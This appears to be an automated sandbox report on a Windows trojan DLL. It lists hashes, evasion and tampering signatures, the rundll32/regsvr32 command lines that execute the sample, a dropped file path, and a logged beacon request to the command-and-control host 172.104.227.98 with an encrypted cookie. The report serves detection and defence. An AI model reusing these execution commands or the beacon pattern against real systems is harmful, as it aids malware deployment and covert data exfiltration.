Play interactive tour

Edit tour

Windows Analysis Report Bccw1xUJah

Overview

General Information

Sample Name:	Bccw1xUJah (renamed file extension from none to dll)
Analysis ID:	533066
MD5:	fbe56ca46b61fa3008caa98e6f4a917a
SHA1:	ec752c16c271384004ad3dc4a25d6fbf52b2bcb8
SHA256:	a46566a9cae02c1b04da80f4ff402727eb41ed0d8c0ab8f837a10d68cfa4f61b
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Changes security center settings (notifications, updates, antivirus, firewall)

Sigma detected: Suspicious Svchost Process

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

AV process strings found (often used to terminate AV products)

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Registers a DLL

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4252 cmdline: loaddll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 2964 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 1320 cmdline: rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 5036 cmdline: regsvr32.exe /s C:\Users\user\Desktop\Bccw1xUJah.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

rundll32.exe (PID: 7048 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

iexplore.exe (PID: 2856 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4620 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2856 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 5544 cmdline: rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7112 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Frzzoul\kwwohiulewmulvk.tlr",MlQLn MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Frzzoul\kwwohiulewmulvk.tlr",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 7112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

rundll32.exe (PID: 6220 cmdline: rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_codec_set_threads@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5048 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6348 cmdline: rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,_opj_create_compress@4 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 768 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\Bccw1xUJah.dll",DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5320 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 6256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6424 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6648 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6700 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 6784 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 6804 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4612 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 1268 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 6436 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4252 -ip 4252 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 1972 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5364 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4524 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\Bccw1xUJah.dll,DllRegisterServer, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5544, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p, ProcessId: 7112

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Bccw1xUJah.dll

Virustotal: Detection: 10%

Perma Link

Source: Bccw1xUJah.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.104.227.98:443 -> 192.168.2.5:49881 version: TLS 1.2

Source: Bccw1xUJah.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337021751.0000000003024000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.336893374.000000000303F000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337276806.0000000003024000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001A.00000003.337195624.000000000302A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337050232.000000000302A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.336824489.0000000003044000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.337195624.000000000302A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337050232.000000000302A000.00000004.00000001.sdmp
Source:	Binary string: 2\loaddll32.pdbad source: WerFault.exe, 0000001A.00000002.358937567.0000000002F66000.00000004.00000020.sdmp
Source:	Binary string: aXjjr[jCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.357838123.00000000006D2000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001A.00000003.337004820.000000000301E000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337362299.000000000301E000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000001A.00000003.337021751.0000000003024000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337276806.0000000003024000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 0000001A.00000003.340634134.0000000004BE1000.00000004.00000001.sdmp
Source:	Binary string: 2\loaddll32.pdb source: WerFault.exe, 0000001A.00000002.358937567.0000000002F66000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001A.00000003.337004820.000000000301E000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.337362299.000000000301E000.00000004.00000001.sdmp

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 172.104.227.98 187

Source: global traffic

HTTP traffic detected: GET /fcNtqWRYEAvIh HTTP/1.1Cookie: wFFCSxt=KroKbMrLxdquGLAVpD8mzOTL6+CJEBylxML8+8LJKbm2NFSJfWyg+Ob4gDvMFIJSB8JkauSCmzenkWfybqLjINgruWQ9hyEz6LBdkvbPAZKalyvPo/EjstrhYIOzCYE0U9F6ESIQNH6mPBh1c7AWHgfaTWG0bJf0yIMhiqP3oKSNSNHW+RMKCwRHRmh4DzBf2Vp20YcxrDb6uOijN0eQ3rjnJQu9vDXRscGluLYAx9sKze0sCBY=Host: 172.104.227.98Connection: Keep-AliveCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98
Source: unknown	TCP traffic detected without corresponding DNS query: 172.104.227.98

Source: de-ch[1].htm.6.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: svchost.exe, 00000027.00000003.566412362.000001E8CC986000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 00000027.00000003.566412362.000001E8CC986000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 00000027.00000003.566412362.000001E8CC986000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.566510464.000001E8CC997000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z\|\|.\|\|6f0c105d-3db6-47de-894d-fd95973349e2\|\|1152921505694224549\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000027.00000003.566412362.000001E8CC986000.00000004.00000001.sdmp, svchost.exe, 00000027.00000003.566510464.000001E8CC997000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z\|\|.\|\|6f0c105d-3db6-47de-894d-fd95973349e2\|\|1152921505694224549\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: de-ch[1].htm.6.dr	String found in binary or memory: <a href="https://www.linkedin.com:443/news/story/gibt-es-einen-impfstoffmangel-5630362/?li=BBqfZdV" > equals www.linkedin.com (Linkedin)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xceabfacf,0x01d7e821</date><accdate>0xcee9f868,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xd34ab932,0x01d7e821</date><accdate>0xd3db91dd,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xd6097753,0x01d7e821</date><accdate>0xd7671fa9,0x01d7e821</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.6.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//browser.events.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//browser.events.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.6.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 